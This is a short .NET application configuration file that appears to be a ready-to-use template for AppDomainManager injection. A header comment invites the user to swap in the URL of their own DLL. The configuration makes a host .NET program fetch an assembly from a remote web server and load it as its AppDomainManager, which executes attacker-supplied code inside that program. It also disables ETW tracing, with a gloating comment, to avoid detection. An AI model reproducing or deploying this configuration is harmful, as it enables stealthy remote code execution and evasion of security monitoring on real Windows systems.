<!--
Replace the name, version and publicKeyToken values accordingly in the assemblyIdentity and the AppDomainManagerAssembly elements.

Obviously, replace the URL pointing to your test.dll
-->

<configuration>
   <runtime>
      <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
         <dependentAssembly>
            <assemblyIdentity name="uevmonitor"
                              publicKeyToken="90897ad78e2f57b3"
                              culture="neutral" />
            <codeBase version="0.0.0.0"
                      href="https://lmepatching.azurewebsites.net/uevmonitor.dll"/>
                 
         </dependentAssembly>
      </assemblyBinding>
      <etwEnable enabled="false" /> <!-- Disables ETW :) -->
      <appDomainManagerAssembly value="uevmonitor, Version=0.0.0.0, Culture=neutral, PublicKeyToken=90897ad78e2f57b3" />
      <appDomainManagerType value="MyAppDomainManager" />
   </runtime>
</configuration>